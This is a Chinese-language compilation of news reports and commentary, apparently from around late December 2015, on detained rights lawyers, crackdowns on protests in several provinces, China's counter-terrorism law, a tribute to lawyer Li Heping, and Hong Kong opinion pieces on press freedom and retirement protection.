豔芳對記者說，王清營、袁新亭及唐荊陵被羈押已超過18個月，並在看守所度過兩個聖誕節，現又將度過第二個元旦：「我們作為家屬就希望當局能夠盡快釋放他
們，讓他們和家人團聚。他們已經在裡面過了兩個聖誕節。隋牧青以前曾是唐、袁、王三個人的律師。我們當天吃飯也是呼籲當局能夠盡快釋放隋牧青」。
本台曾報導，今年7月10日，在中國當局大規模抓捕律師行動中，被以「涉嫌煽動顛覆國家
政權罪」監視居住的廣州著名維權律師隋牧青，據稱受到嚴密控制。警方除了不准他看報，就連其妻子寫給他的字條內容，也須經公安逐字審查，並且只准他看教育
兒童的讀物。知情人士稱，公安要求隋牧青的妻子低調，他們「很快放人」的承諾實際上是個謊言。

貴州、江蘇公民網上發言被警查 網絡管控無死角
貴州一小學老師日前因在網上發表據稱呼籲民主和言論自由的網帖被警方帶走調查，而在江蘇，有e租寶投資者因「煽動」受害者前往美國領事館外維權也遭到了當地警方的穩控。
貴州省貴陽市花溪區麥坪鄉劉莊小學老師羅有恆12月28日下午5點被警方帶走調查，原因與其在網上發言有關。
本台記者29日致電羅有恆的弟弟，對方表示目前需要慎重，不便回答記者的提問。而據維權人士發佈在網絡上的消息，羅有恆是因為在網上呼籲民主、言論自由而被帶走的，被關押在當地看守所內，家中的電腦也一同被查抄。不過，目前暫不清楚羅有恆發佈的網帖具體內容是什麼。
除了一些涉及政治的言論被當局視作敏感問題嚴加防範外，與集體維權相關的話題也在當局全面管控之下。
今年12月，P2P金融投資平台e租寶因涉嫌非法集資被查，部分投資者因不滿官方媒體曾為e租寶宣傳做廣告，令他們輕信，造成損失，兩度前往央視大樓外拉橫幅抗議。
日前網上流傳了一份向江蘇鎮江潤州公安分局及網安支隊下發的重要事項交辦通知單，要求對網民「恢復經營江蘇8W」開展落地穩控工作，原因是他在e租寶的維權QQ群內「煽動去美國領事館，讓國際上對我們國家有看法」。
廣西北海數百村民維權近月遭千警鎮壓16人被拘
廣西北海市鐵山港區玉塘村的維權村民週二（12月29日）遭到上千警察鎮壓，期間多人被毆打，16名村民被抓捕。
為抗議中石化LNG項目施工污染碼頭導致村民養殖的沙蟲大量死亡，玉塘村數百村民本月7日發起示威，連日將通往中石化工地的道路阻斷，要求賠償。
村民「鄧鄧鄧燕伶」發帖說：北海市鐵山港中石化海上項目暴力施工，致使村民放養在海灘上的沙蟲死亡，海水遭受巨大污染!沙蟲俗稱星格蟲，北海海洋特產，價格在六百多塊一斤，蒙受損失的村民分文賠償未獲。
「鄧鄧鄧燕伶」說：今日封鎖村中道路阻止施工隊進入海灘，政府派出一千五百名武警，有村民被毆打，並帶走十五人，這樣爆炸性的事件卻被外界封鎖！
現場圖片顯示，上百村民靜坐在道路上，周邊有多條寫有「不賠償因污染死亡沙蟲的損失，天理難容」等字樣的條幅，之後村民被大批手持盾牌、棍棒、攜帶狼狗的警察、武警暴力驅散，一些村民受傷倒地，被抬上救護車。
甘肅永昌超市逼死小女孩數千人集會討公道
週二（12月29日），甘肅省金昌市永昌縣數千市民到華東超市集會，為日前跳樓自殺的一名小女孩討說法，大批警察戒備。
據
網友透露，28日中午，13歲小女孩趙琴在永昌縣華東超市偷拿巧克力後被超市老闆扣留、羞辱、恐嚇，並以家長不夠錢交罰款為由扣留其近2小時，之後趙琴趁
亂離開超市跳樓自殺。網友「雙魚森嶼暖樹」發帖說：12月28日星期一，在永昌一位13歲的小女孩因拿了華東超市一個棒棒糖，而被華東超市老闆羞辱，並叫
來其家長和老師且讓其家長賠償150元，並且將那位小女孩在華東超市罰站了2小時，最後導致這位小女孩跳樓自殺而死。
圖片以及視頻顯示，一些死者家屬手持寫有「尋找目擊證人」等字樣的橫幅站在超市門口，有大批市民聚集在超市外面，大量警察、武警在現場阻攔市民，人山人海，超市的玻璃門被砸壞。
網友「涼人心心」發帖說：敬愛的永昌人民，今天因一位七中女生被華東超市侮辱，跳樓自
殺，我們永昌人民要團結一起為這位學生討公道，讓華東超市滾出永昌，倡導永昌人不賣華東貨物，是永昌請頂一下為死者申冤，就因為拿了一塊巧克力，被罰站兩
小時，之後家長來交了150元罰款，出去就跳樓了，花季少女就這樣失去了生命。
廣東手機廠倒閉2000工人薪水未發 近千人龍崗區政府請願四人被捕
廣東省深圳市中天信電子有限公司因資不抵債，12月25日宣佈倒閉，但是拖欠全廠兩千多人兩個月的薪水和補償金，至今未支付。28及29日，該廠近千工人連續到龍崗區政府請願，政府人員拒絕提供幫助。工人告訴本台，當局出動三百防暴警察，打傷多人，抓走四人。
歲末年終，討薪事件不斷。深圳市中天信電子廠近千名工人，不堪廠方兩個月未發薪水，數日
前又宣佈倒閉，12月28日和29日，連續到龍崗區政府請願，要求官員出面協助討薪，不但未獲幫助，反遭到公安鎮壓。工人發帖稱，全廠兩千工人自18日舉
行罷工，25日，廠方宣佈倒閉。引起工人強烈不滿。工人們於是向政府求助，卻被毆打，四人被抓。
該廠工人潘女士29日告訴本台，他們當天繼續到區政府請願，但還是無人理會：「工人拿不到工資，有兩、三個月，11月份和12月份，還有補償金，有兩千多位工人」。
中國大陸民工年終討薪：跳不出的怪圈？
年關歲末，在中國大陸，外出打工的人都想回家過年。但是，很多農民工卻因為拿不到被欠工資不能回家。欠薪問題在中國建築行業尤為嚴重。有評論認為，中國民工年終討薪成跳不出怪圈的根本原因在於官商勾結盤剝；農民工打官司討薪不成因為中國司法不獨立。
中國官方新華網12月27號報導，河南省高院今年末僅半個月就受理了拖欠農民工工資案６
千餘件，涉案金額３.１４億元。一方面是中央和地方密集出台政策要求嚴查，另一方面，農民工工資被拖欠案依然不斷，「年終討薪」成了農民工跳不出去的怪
圈？報導舉例說，鄭州市惠濟區新城街道兩棟９層高的雙子座商業大廈早已封頂，然而就在這高樓腳下破舊板房裡，還住著曾經的建設者。他們因為沒拿到工資，不
能回家過年。從８月２０日商業廣場項目主體工程完工後，羅以學已經和工友們在這裡生活了４個月，只為要回被拖欠的６萬多元工資。四川成都的維權人士黃琦對
本台記者說，在中國大陸，類似的建築商欠薪事件在中國各地都很普遍：
「這個問題由來已久，就是因為農民工在社會各階層中處於一個最弱勢的群體。他們的各種權
益根本得不到保障，老闆和包工頭敢欠薪，是因為他們有後台，其根本原因是官商勾結。」在中國各地的建築行業，由於監管不嚴，很多承包商和民工沒有簽訂正式
的勞工合同，因此欠薪後，農民工與打官司也很難，黃琦說，
深圳手機代工廠結業欠工人逾3500萬元 (視頻)
大約200名“深圳中天信電子廠”的工人，周二（29日）連續第二日到龍崗區政府示威，要求當局解凍公司的帳戶，向2000多名員工發放11月及12月的欠薪及補償金，合共3500多萬元人民幣。
由於區政府沒有回應，示威工人下午移師到福田區的深圳市政府示威，要求政府交代公司資產和賠償安排。當局調派過百名全副武裝的防暴警察，將示威者包圍在市政府對面的廣場，不准他們離開，連上廁所也不可以，然後安排大巴將他們押返龍崗區。
一名工廠員工李先生接受本台訪問時稱，市政府指他們越級投訴，不作處理，令他們感到很無奈。
李先生：看到5、6車的武警，我看到有盾牌、警棍，還有一個拿著衝鋒槍，我們員工當然很害怕，不敢動。我們去區政府投訴過幾次，沒有一個明確的答覆、仲裁，也沒有一些正式文件，都是一些口頭的。
另一位受訪工人鄧小姐就稱，200名工人周一曾到龍崗區政府外示威，但遭公安沒收示威標語，期間雙方發生推撞，有4個工人受傷並且一度被抓。
鄧小姐：橫幅被他沒收了，拉了我們4個人。把他們雙手綁起，壓在地上。後來我們攔在馬路，堵了1個多小時，警方跟我們談判，可以把人放出來，要求我們20分鐘內疏散。
鄧小姐在中天信電子廠做了兩年，月薪連加班費每月大約5、6000元，2個月工資和補償
金，大約2萬幾元，但政府只是承諾，墊支11月和12月的工資，每個工人每月3600元。據了解，公司單是欠供應商的貨款已達2.5億元，還未計銀行和高
利貸的欠款，她擔心公司變賣資產後優先賠給欠債人，到時工人就追討無門。
貴州上千教師罷課抗議獎金遭剋扣 連續維權近一週仍無果
為抗議政府剋扣獎金，貴州省仁懷市全市6000中小學教師本月24日開始罷課討說
法，12月28日，上千教師圍堵市政府與大批警察對峙。當地教育局在接受本台查詢時指，沒有文件支持教師的訴求，領導們已經到各個學校做教師們的工作。但
教師們卻表示，當局出爾反爾，言而無信。至本週二事件仍未解決。
因不滿當局剋扣獎金，貴州省仁懷市的部分教師自本月24日開始罷課，數天之內蔓延至全市
中小學。12月28日，上千教師圍堵仁懷市政府至深夜，與大批警察對峙。據上傳到網絡的數十張圖片顯示，不同學校的教師們，集中在各自的校園中，手持「言
而無信，欺人太甚」、「維護教師合法權益」等標語或橫幅。而在仁懷市政府大門外，教師將道路阻斷，大批警察在現場拉起警戒線戒備。
6000教師被剋扣獎金 數百校罷課抗議 (視頻)
貴州省仁懷市數百間學校的教師，不滿被政府克扣績效獎金，連日發動罷課抗議。上千教師周一（28日）並集體到市中心抗議，與警察一度對峙。事件至今仍未解決。
仁懷市6000名中小學教師，去年的績效獎金，被拖了近一年，至今仍未有跡象發放，教師們便連日罷課抗議。
教師梁先生周二接受本台訪問時指，罷課行動自上周四陸續在市內多間學校蔓延，過去幾天，教育部門在績效獎金問題上“耍大極”，教師們周一憤而上街抗議。
梁先生指，周一晚，上千教師到市政府一帶聚集，引起民眾的圍觀。市政府隨即派官員到場勸說，又出動數以百計的民警、防暴警到教師聚集一帶維穩，雙方一度對峙，至深夜，教師們陸續離開，幸未有發生衝突。
梁先生說：我們上訪領導，有些該發給老師的獎金，政府就是沒有落實到位，所以老師們就罷課了。
記者說：聽說昨晚不少老師上街抗議，之後怎樣了?
梁先生說：之後警察來了，不讓老師搞事。
綜合數名教師電話受訪及網上文字透露，市教育系統早已完成去年度的教師考核，並獲市政府
撥款向教師頒發獎金，按市內6000名合資格教師計算，每名教師可獲獎金25000元。2014年底，教育部門向每名教師預發了當中的10000元，但餘
下的15000元獎金，一直拖欠。
溫州下嶺教堂十字架遭強拆 信徒連夜重立誓不妥協
溫州鹿城區下嶺教堂的十字架於12月28日夜晚遭到當局強拆，但信徒們又連夜將十字架重新立起。
溫州下嶺教堂十字架遭強拆！一名教會信徒告訴記者，當局是在28日夜晚7點左右前來，當時因為是晚飯時間，教堂內只有兩名值班的信徒，完全無力抵抗。當局還封鎖了前往教堂的道路，令前往支援的弟兄姊妹無法靠近。
聖誕節剛過教堂十字架即遭強拆
温州市鹿城區下岭教堂一名信徒週二（29日）表示，周一晚約7時，60多名保安及便衣帶
備吊車到達教堂，想偷偷拆除十字架。當時是晚餐時間，教堂沒有人，因為當局事前沒通知，其後信徒及同工趕回教堂，要求他們出示文件，他們不肯出示，也不說
是那個部門委派，部分人已佔領教堂頂層，信徒與他們發生衝突，於是報警。警察到場了解後，推說要請示上級然後離去。最後在10時多，豎立在教堂頂部的十字
架被拆除。
年終報導：藏人未來誰主沉浮
自2014年底流亡西藏精神領袖達賴喇嘛表達了自己可能不再轉世的可能性後，就此展開的
爭論在2015年間一直不休。中國政府則在其發表的西藏問題白皮書中繼續譴責達賴喇嘛與西藏流亡政府的“中間道路”是試圖變相實現西藏獨立。中國政府還在
慶祝成立西藏自治區成立50週年，但流亡藏人卻觀點迥異。
歐盟駐華商會仍對反恐法感到憂慮

中國人大常委會周日表決通過了備受爭議的《反恐法》。該法其中規定科技公司有義務協助執法部門破解信息，但草案中要求安裝安全"後門通道"的內容被刪除。草案裡原先還明文要求在中國境內設置服務器和擁有用戶數據的科技公司必須與當局合作，最終的版本中也刪除了這一條。
中國《反恐法》引發西方各界擔憂
上週日，北京通過新反恐法案，此舉引發西方各界的關注。
星期一，歐盟駐華商會發表聲明，稱儘管新反恐法摒棄了一些更具爭議性內容，但商會對中國
新反恐法仍存關切。聲明指出，反恐法最終版本中去掉了有關要求提交加密代碼以及服務器和數據本地化的表述，歐盟商會認可這一積極進展；然而，商會仍然懷有
對市場准入、知識產權，以及監控、報告和審查恐怖主義內容的義務等問題的擔憂。
資料顯示，《反恐法》草案中要求安裝安全"後門通道"，還要求在中國境內設置服務器和擁有用戶數據的科技公司必須與當局合作。最終通過的版本中刪除了這兩條內容，但規定科技公司有義務協助執法部門破解信息。
此外，“自由之家”組織也在本週一發表聲明，稱反恐法是中國試圖以反恐為幌子限制言論自由和異議的嘗試。聲明指出，新反恐法擴大了政府已經氾濫的權力來監控和平公民、收緊審查，並給官員更多法律依據來關押記者、活動家、少數民族和宗教少數派，違反了中國人民的基本權利。
據中國官媒新華社報導，《反恐法》對恐怖主義作出明確定義，規定反恐工作應當依法進行，
尊重和保障人權，維護公民和組織的合法權益，並尊重公民的宗教信仰自由和民族風俗習慣。就在反恐法通過的前一日，中國外交部證實法國《新觀察家》駐北京記
者高潔（郭玉）被中方拒絕延期其記者證，等於變相被驅逐出境。高潔曾在報導說，新疆維吾爾族人的暴力行為與中國當局對他們在各方面的不公和鎮壓有關。
早在12月22日，美國國務院發言人指出，“《反恐法》草案將導致對中國人言論、結社、和平集會和宗教等自由的進一步限制。”
此外，美國總統奧巴馬3月份接受路透社專訪時也對反恐法草案提出批評，並表示已經就其中針對美國科技公司的條款向習近平提出問題，呼籲中國改變有關政策。

维权律师李和平（资料图/新公民网）.抓捕维权人士敢言者是专制政权为了维护其专制体制的一个显著特征；但像中共这样大规模抓捕维权人士、维权律师的现象就是中共政权灭亡之前垂死挣扎的标志之一。
2015年7月9号是中共比较明显的又一次大抓捕行动的开始，截止到目前，已知的有300 多，实际迄今已有超过几千位维权人士、维权律师及他们的家人遭到抓捕、关押。其中我的朋友李和平律师也未能幸免。
2015年7月10号下午，李和平律师被天津市公安局人员突然带走，家中被全面搜查，电脑等物品被抢走。至今李律师已经被公安人员绑架近半年，仍无任何音信。
就在李和平律师被绑架毫无音信的时候，他的弟弟李春富律师也被带走至今。律师一直不能介入他们的案件，谁也无法知道他们遭受了何等的酷刑与虐待。他的爱人王峭玲，也曾被株连而遭到公安人员的上门威胁。
我的经历告诉我，中共是一个没有任何道德底线、无恶不作的流氓政权。它早已全面流氓黑社会化。以前还多少假装讲法，用以欺骗民众，现在已经彻底地撕掉自己的遮羞布，露出了狰狞的本来面目。
一个正常的社会是惩恶扬善、优胜劣汰的，而在中共专制之下，中国社会是逆向淘汰的，好人的空间越来越小，坏人可以为所欲为。
记 得在2004年，北京公安因余杰写的文章而到他家骚扰，并威胁要带走调查。当时和平兄得到消息后，果断地将自己的钥匙，银行卡等交给家人，亲自驾车，立即 赶到余杰家，以律师身份介入其中。这样的义举在中国公民社会刚刚觉醒的早期是非常难得的。我当时只是在自由亚洲电台听到“律师立即赶到现场”的相关报道， 并不知道赶到现场的律师是谁。后来听朋友告知此律师就是李和平，自此我对和平兄肃然起敬。
李和平律师遭到中共的迫害也是预料之中的事，在中共治下，只要你想要中国变得更好，社会更公正，并为此付出实际行动的话，就会成为中共的眼中钉，遭到它的迫害就是迟早的事情。
据我所知，10多年来，和平兄做了太多有利于社会、有利于人民而不利于专制政党的事情。陕北石油案有他的身影；山东暴力‘计生’，他也参与调查；浙江东阳反抗化工污染的维权案，他亲赴现场，为受害者代理；包括一些宗教案件，他也毫不退缩……
多年来，李和平律师一直在为公民的权利而奔走呼吁。即使在平时，他也不断传播法治观念，普及公民思想，从不同的角度帮助朋友。他是一个负责任的、只要能做就绝不退缩的人。
因不断地参与维权，多年来，不仅受到跟踪，威胁，恐吓，还遭到电棍殴打等酷刑。2009 年最终被中共停业，失去律师执照。在目前中共专制体制下，中共怎么能够容忍一个坚持不懈、毫不妥协的维护法律尊严和社会公正的律师正常存在呢？
想念你，我的朋友！我依然记得在我即将离开生我养我的那片土地时，您打电话到朝阳医院，劝我留下来，继续战斗。然后又立刻放声痛哭的声音始终留在我的心中。而如今我却仍不知你身在何处！

身處高位更需自我約束
而歸根究柢，這種共生關係是不平衡的，時時出現緊張和矛盾：傳媒掌握着藝人的生存命脈——曝光率，因此只要記者不踩過底線（如在私人領域偷拍）藝人亦無話 可說；而對於並不依賴傳媒曝光率為生的政府官員而言，記者是否有權追蹤其八小時之外的行蹤，的確是模糊地帶。一般而言，因為高官與普通公務員不同，身負重 責和厚祿，工作時間答覆記者採訪和查詢是義務之外，工作之餘的生活接受適當的傳媒監督是被社會默許的。因此，吳克儉此次捱轟，實在是因為他將自身擺在了普 通公務員的位置。雨傘運動以後，香港記者在採訪期間遭警員留難的情況屢有發生，以此次吳克儉的高官身份才格外引發爭議。以吳克儉十多年的公務生 涯，不可能對香港記者的採訪方式毫無了解，此次報警阻撓記者採訪，筆者更傾向於解釋為是本地傳媒與政府關係惡化的表徵之一。高官們對傳媒如此緊張，除了是 因為在整個泛政治化的社會氛圍中神經高度緊張之外，更顯示是威權思維作怪，容不下反對聲音。在過去幾十年新自由主義的變局中，港台兩地傳媒才從政府喉舌的 角色中轉型為獨立的商業機構，這過程中調查新聞功不可沒。無論是從信息資源還是權力來看，政府官員都遠遠高於傳媒記者；這種情況下吳克儉仍要報警阻撓記者 採訪，用打壓二字來形容並不過份。看看兩蔣時代的台灣和如今的中國，公眾便知傳媒受壓的結果；身處教育局局長高位的吳克儉，更需知自我約束的必要。

社會分歧助梁特開脫
至於公義，這個政府更是完全說不上。過去三年來，香港的貧富懸殊有好轉嗎？社會流動機會增加了嗎？不同階層市民的機會更均等了嗎？政治過程更透明公正了 嗎？答案完全是否定的。除了最富裕的階層及大財閥以外，絕大部份市民的收入都停滯不前，生活開支則不斷攀升，劏房每呎租金媲美豪宅，衣食住行費用有增無 減。這合乎公義嗎？政治體制依然由權貴把持，多數市民代表在議會內變成少數，落實民主政制遙遙無期，無德無能者繼續竊踞高位。這叫公義嗎？一個不公不義的 政府居然好意思打扮成公義使者，並起而批評幾十年來爭取全民退保加強保障市民退休生活的學者不公義實在荒謬絕倫。顯而易見，林鄭月娥及政府的做 法、說法根本不是想認真討論退休保障問題，根本不是有心加強香港應對老齡化社會的能力，而是要千方百計挑動社會矛盾及分歧特別是世代分歧，好把學者、社福 團體爭取多年的全民退保制度「一棍打死」，從而為梁振英開脫，讓他毋須負上違反選舉承諾的責任，讓他可以把改善退休保障不成功的責任推在學者、年輕人、社 福團體身上。

回到林鄭月娥提出的所謂「不公義」：即要年輕人不問貧富供養長者（包括她自己）的矛盾。這其實是個取巧及誤導的問題。首先，像林鄭這樣的富貴長者其實數目 極少，大部份長者生活為香港打拼半生的長者生活拮据，僅能餬口。林鄭把不到5%富貴長者跟95%混在一起並以此批評全民退保不公義完全是混淆視聽。說到年 輕人的負擔，像林鄭月娥般的高級公務員每月享有優厚的長俸，這正是納稅人包括年輕人的沉重負擔。真要計較的話，年輕人納稅供養林鄭優遊的退休而自己的父母 則只能拮据的度過晚年。這算是公義嗎？而且，在實行強積金制度後，年輕人及上班族實質上正付出形同payroll tax的5%強積金供款，當中至少有1-2%變成了中介的基金公司利潤。也就是說，所有上班族其實都要負擔退休保障的支出，問題是以何種形式及如何管理而 已。學者提出把部份強積金供款變成退保的資金來源再把保障範圍擴大至包括家庭主婦及沒有供款的退休長者是其中一種可能方案，是否可行，財政上是否可持續應 當仔細分析討論，但這絕不是年輕人跟中、老年人利益對立起來的安排，也不是刻意加重年輕世代的負擔。事實上對年輕世代而言，強積金常被形容為「強迫 金」，5%供款則形同額外稅款，林鄭月娥怎麼不提這個負擔呢？
由此可知，她的所謂不公義只是為了挑動社會內部紛爭，令社會應有的退休保障討論胎死腹中而已。
